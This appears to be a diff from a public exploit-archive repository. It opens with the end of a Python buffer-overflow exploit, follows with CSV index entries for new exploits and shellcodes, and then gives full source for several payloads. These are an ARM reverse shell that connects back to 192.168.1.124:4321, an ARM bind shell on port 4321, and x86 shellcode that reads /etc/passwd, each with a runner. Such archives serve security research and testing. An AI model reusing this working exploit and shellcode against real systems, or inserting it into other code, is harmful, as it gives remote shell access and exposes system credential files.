+shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
+shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
+shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
+shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
+shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
+shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
+shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
+shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
+shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
+shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
+shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
+shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
+shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
+shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
+shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
+shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
+
+payload = junk+ eip + nops * 3 + rop_chain + nops*4  + egg64 + nops*4  + "w00tw00t" + shellcode
+
+try:
+	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.connect((target,8888))
+	s.send(payload)
+except:
+	print "Crashed!"

files_exploits.csv

@@ -6273,6 +6273,8 @@ id,file,description,date,author,type,platform,port
 46236,exploits/macos/dos/46236.py,"Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)",2019-01-24,"Saeed Hasanzadeh",dos,macos,
 46246,exploits/multiple/dos/46246.txt,"Lua 5.3.5 - 'debug.upvaluejoin' Use After Free",2019-01-25,"Fady Mohammed Osman",dos,multiple,
 46248,exploits/multiple/dos/46248.c,"iOS/macOS - 'task_swap_mach_voucher()' Use-After-Free",2019-01-25,"Google Security Research",dos,multiple,
+46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000
+46272,exploits/windows/dos/46272.py,"Smart VPN 1.1.3.0 - Denial of Service (PoC)",2019-01-28,0xB9,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10244,6 +10246,11 @@ id,file,description,date,author,type,platform,port
 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,
 46241,exploits/linux/local/46241.rb,"AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)",2019-01-24,Metasploit,local,linux,
+46249,exploits/linux/local/46249.py,"MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation",2019-01-28,d7x,local,linux,
+46255,exploits/windows/local/46255.py,"Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)",2019-01-28,"Nawaf Alkeraithe",local,windows,
+46265,exploits/windows/local/46265.py,"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)",2019-01-28,"Dino Covotsos",local,windows,
+46267,exploits/windows/local/46267.py,"BEWARD Intercom 2.3.1 - Credentials Disclosure",2019-01-28,LiquidWorm,local,windows,
+46269,exploits/windows/local/46269.py,"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-28,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17119,6 +17126,7 @@ id,file,description,date,author,type,platform,port
 46218,exploits/windows/remote/46218.py,"CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt",2019-01-22,T3jv1l,remote,windows,8888
 46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,
 46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
+46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40726,3 +40734,17 @@ id,file,description,date,author,type,platform,port
 46244,exploits/php/webapps/46244.txt,"GreenCMS 2.x - SQL Injection",2019-01-25,"Ihsan Sencan",webapps,php,80
 46245,exploits/php/webapps/46245.txt,"GreenCMS 2.x - Arbitrary File Download",2019-01-25,"Ihsan Sencan",webapps,php,80
 46247,exploits/php/webapps/46247.txt,"Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing",2019-01-25,MTK,webapps,php,80
+46251,exploits/java/webapps/46251.txt,"Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting",2019-01-28,"Ishaq Mohammed",webapps,java,80
+46252,exploits/php/webapps/46252.txt,"WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download",2019-01-28,41!kh4224rDz,webapps,php,80
+46253,exploits/hardware/webapps/46253.html,"AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery",2019-01-28,"Ali Can Gönüllü",webapps,hardware,80
+46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,
+46259,exploits/php/webapps/46259.txt,"CMSsite 1.0 - 'cat_id' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80
+46260,exploits/php/webapps/46260.txt,"CMSsite 1.0 - 'search' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80
+46262,exploits/hardware/webapps/46262.py,"Cisco RV300 / RV320 - Information Disclosure",2019-01-28,"Harom Ramos",webapps,hardware,
+46263,exploits/hardware/webapps/46263.txt,"Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting",2019-01-28,"Bhushan B. Patil",webapps,hardware,443
+46266,exploits/php/webapps/46266.txt,"Newsbull Haber Script 1.0.0 - 'search' SQL Injection",2019-01-28,"Mehmet EMIROGLU",webapps,php,80
+46268,exploits/php/webapps/46268.txt,"Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection",2019-01-28,"Carlos Avila",webapps,php,80
+46270,exploits/php/webapps/46270.txt,"Teameyo Project Management System 1.0 - SQL Injection",2019-01-28,"Ihsan Sencan",webapps,php,80
+46271,exploits/php/webapps/46271.txt,"Mess Management System 1.0 - SQL Injection",2019-01-28,"Ihsan Sencan",webapps,php,80
+46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80
+46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80

files_shellcodes.csv

@@ -931,3 +931,7 @@ id,file,description,date,author,type,platform
 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator
 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86
+46256,shellcodes/linux_x86/46256.c,"Linux/x86 - exit(0) Shellcode (5 bytes)",2019-01-28,"Daniele Votta",shellcode,linux_x86
+46257,shellcodes/linux_x86/46257.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2)",2019-01-28,"Joao Batista",shellcode,linux_x86
+46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
+46264,shellcodes/arm/46264.s,"Linux/ARM -  Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm

shellcodes/arm/46258.s

@@ -0,0 +1,52 @@
+/*
+* Title:  Linux/ARM - Reverse_Shell Shellcode TCP (/bin/sh). Null free shellcode (60 bytes)
+*Reverse shellcode for ARM 60 bytes-shortest ever till the date of creation
+* Date:   2019-01-27
+* Tested: armv7l (Raspberry Pi b3+)
+* Author: Gokul Babu-https://www.linkedin.com/in/gokul-babu-452b3b112/
+*/
+ 
+/*socket 281, domain=2,type=1,protocol=0*/
+/*connect 283,sockfd=resultant vaule r0=3,*addr=AF_inet+port+ip,addrlen=16bytes*/
+/*dup2 63,oldfd=sockfd, newfd=0-stdin,1-stout,2-stderr*/
+/*execve 11, *command="/bin/sh",0,0"*/
+.section .text
+.global _start
+_start:
+.ARM
+	add r3,pc,#1
+	bx r3
+.THUMB
+//socket:
+	mov r0,#2
+	mov r1,#1
+	mov r7,#200
+	add r7,#81
+	svc #1
+	push {r0,r1,r2} /*store all values r0=3,r1=1,r2=0*/
+//connect:
+	adr r1,exc+8 /*pointing to AF_Inet+PORT+IP*/
+	strb r2,[r1,#1]
+	mov r2,#16
+	add r7,#2
+	svc #1
+//dup2:
+//dup2(3,2)/*No need of stderr, program works fine without stderr*/
+	pop {r0,r1,r2} /*Restoring all values as the values would have been changed after connect call*/
+	mov r7,#63
+//dup2(3,1)
+	svc #1
+//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference
+	sub r1,#1
+	svc #1
+//execve:
+	adr r0,exc
+	strb r1,[r0,#7]
+	mov r7,#11
+	svc #1
+exc:
+        .ascii "/bin/shX"
+//struct:
+	.ascii "\x02\xff"
+	.ascii "\x10\xE1" //port 4321
+	.byte 192,168,1,124 //IP

shellcodes/arm/46264.s

@@ -0,0 +1,66 @@
+/*
+* Title:  Linux/ARM - Bind_Shell Shellcode TCP (/bin/sh). Null free shellcode 0.0.0.0:4321 (84 bytes)
+*Author: Gokul Babu-https://www.linkedin.com/in/gokul-babu-452b3b112/
+* Tested: armv7l (Raspberry Pi b3+)
+* Date:   2019-01-28
+*/
+
+/*socket-281, domain=2,type=1,protocol=0*/
+/*bind-282 sockfd=final result of socket,&addr=struct,adrlen=16*/
+/*listen-284,sockfd=id value-r4,backlog=1/2*/
+/*accept-285,sockfd=id,&addr=0,addrlen=0*/
+/*dup2-63,sockfd=final result of accept r4<-r0=4,newfd=0,1,2*/
+/*execve-11,execv="/bin/sh",0,0*/
+
+.section .text
+.global _start
+_start:
+.ARM
+	add r3,pc,#1
+	bx r3
+.THUMB
+//socket:
+	mov r0,#2
+	mov r1,#1
+	mov r7,#200
+	add r7,#81
+	svc #1
+	mov r4,r0
+	push {r0,r1,r2} /*r0=3,r1=1,r2=0*/
+//bind:
+	adr r1,struct
+	strb r2,[r1,#1]
+	str r2,[r1,#4] /*store r2=0 in IP*/
+	mov r2,#16
+	add r7,#1
+	svc #1
+//listen:
+	pop {r0,r1,r2} /*r0=3,r1=1,r2=0*/
+	add r7,#2
+	svc #1
+//accept:
+	mov r0,r4
+	sub r1,r1 
+	add r7,#1
+	svc #1
+	add r0,r0,r2 /*r0=4,r2=0*/
+//dup2:
+//dup(4,2)
+	mov r7,#63
+//dup(4,1)
+	mov r1,#1
+	svc #1
+//dup(4,0)
+	sub r1,#1
+	svc #1
+//execve:
+	adr r0,exc
+	strb r2,[r0,#7]
+	mov r7,#11
+	svc #1
+exc:
+        .ascii "/bin/shX"
+struct:
+	.ascii "\x02\xff"
+	.ascii "\x10\xE1" //port 4321
+	.byte  1,1,1,1 //IP-0.0.0.0

shellcodes/linux_x86/46256.c

@@ -0,0 +1,33 @@
+/* 
+# Date: 26/01/2019
+# Exit.asm
+# Author: Daniele Votta
+# Description: Exit with no nulls.
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 5
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+   0:	31 c0                	xor    eax,eax
+   2:	40                   	inc    eax
+   3:	cd 80                	int    0x80
+======================= POC Daniele Votta =======================
+*/
+
+unsigned char shellcode[] = \
+"\x31\xc0\x40\xcd\x80";
+
+int main()
+{
+	printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+	int (*ret)() = (int(*)())shellcode;
+
+	ret();
+}

shellcodes/linux_x86/46257.c

@@ -0,0 +1,57 @@
+/*
+; Title     : Linux/x86 - Read /etc/passwd Shellcode (58 bytes)
+; Date      : Jan, 2018
+; Author    : Joao Batista
+; SLAE ID   : SLAE-1420
+; Size      : 58 bytes
+; Tested on : i686 GNU/Linux
+
+global _start
+
+section .text
+
+_start:
+        xor ecx,ecx
+        mul ecx
+        jmp short two
+one:
+        pop ebx
+        mov al,0x5
+        int 0x80
+        xchg esi,eax
+        jmp short read
+exit:
+        mov al,byte 0x1
+        int 0x80
+read:
+        mov ebx,esi
+        mov al, 0x3
+        mov ecx, esp
+        mov dl,0x1
+        int 0x80
+
+        xor ebx,ebx
+        cmp eax,ebx
+        je exit
+
+        add al,0x3
+        mov bl,dl
+        int 0x80
+
+        jmp short read
+two:
+        call one
+        string: db "/etc/passwd"
+*/
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\xeb\x24\x5b\xb0\x05\xcd\x80\x96\xeb\x04\xb0\x01\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xec\x04\x03\x88\xd3\xcd\x80\xeb\xe8\xe8\xd7\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+main()
+{
+	printf("shellcode length:  %d\n", strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}